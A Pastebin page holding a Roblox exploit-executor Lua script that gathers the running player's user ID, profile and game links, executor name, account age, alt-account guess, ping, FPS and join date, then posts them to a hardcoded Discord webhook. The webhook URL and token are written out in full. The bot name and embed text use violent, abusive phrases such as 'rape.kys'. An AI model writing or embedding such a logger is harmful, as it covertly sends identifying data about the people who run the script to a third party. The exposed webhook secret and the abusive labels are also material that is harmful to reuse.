Advertisement
Swept_dev

Untitled

Mar 5th, 2024 (edited)
192
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.58 KB | None | 0 0
  1. local Webhook = "https://discordapp.com/api/webhooks/1214792014709919765/E9KPJgFoSvrtK_5s0iKFs5AKrsQA-YYeLyA5wR5kdcRur6muvcs7LII7xWyDFGWAN-Dx" getgenv().Discord_UserID = "1081767236424974486"
  2.  
  3. local player = game:GetService"Players".LocalPlayer local joinDate = os.date("!*t", os.time() - (player.AccountAge*86400)) local premium = false;local alt = true local ping = string.format('%.0f', game.Stats.Network.ServerStatsItem["Data Ping"]:GetValue()) FPS = string.split(game.Stats.Workspace.Heartbeat:GetValueString(), ".") local executor = identifyexecutor() or "Unknown"
  4. local Thing = game:HttpGet(string.format("https://thumbnails.roblox.com/v1/users/avatar-headshot?userIds=".. game.Players.LocalPlayer.UserId .. "&size=150x150&format=Png&isCircular=false", game.Players.LocalPlayer.UserId)) Thing = game:GetService("HttpService"):JSONDecode(Thing).data[1] local AvatarImage = Thing.imageUrl
  5. if player.MembershipType == Enum.MembershipType.Premium then premium = true end
  6. if not premium and player.AccountAge >= 70 then alt = "Possible" elseif premium and player.AccountAge >= 70 then alt = false end
  7.  
  8. local msg = {
  9. ["username"] = "rape.kys",
  10. ["avatar_url"] = "https://static.wikia.nocookie.net/madmurderer/images/1/12/Noob.png/revision/latest/scale-to-width-down/448?cb=20150212073303",
  11. ["content"] = ( getgenv().Discord_UserID ~= "" and getgenv().Discord_UserID ~= nil) and tostring("<@"..getgenv().Discord_UserID..">**:**") or "",
  12. ["embeds"] = {{
  13. ["color"] = tonumber(tostring("0x32CD32")),
  14. ["title"] = "Execution on rape.kys logged",
  15. ["thumbnail"] = {["url"] = AvatarImage},
  16. ["fields"] = {
  17. {["name"] = "Player:",["value"] = "||[ "..player.UserId.."](" .. tostring("https://www.roblox.com/users/" .. game.Players.LocalPlayer.UserId .. "/profile")..") " .. tostring("https://www.roblox.com/games/" .. game.PlaceId).."||",["inline"] = true},
  18. {["name"] = "Executor:",["value"] = executor,["inline"] = true},
  19. {["name"] = "Alt:",["value"] = alt,["inline"] = true},
  20. {["name"] = "Account Age:",["value"] = player.AccountAge.."day(s)",["inline"] = true},
  21. {["name"] = "Network:",["value"] = tostring(FPS[1]) .. " FPS, " .. tostring(ping) .. " ping",["inline"] = true},
  22. {["name"] = "Date Joined:",["value"] = joinDate.day.."/"..joinDate.month.."/"..joinDate.year,["inline"] = true},
  23. },
  24. ["footer"] = {["icon_url"] = "https://cdn.discordapp.com/attachments/1214783461517295658/1214791574781960214/Png.png?ex=65fa65d1&is=65e7f0d1&hm=b156400a41e394eda5df2ee5433917bdfe53f45bf340fdfab409d2d7fb83cfba&",["text"] = "rape"},
  25. ['timestamp'] = os.date("!%Y-%m-%dT%X.000Z")}
  26. }
  27. }
  28. request = http_request or request or HttpPost or syn.request request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)})
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement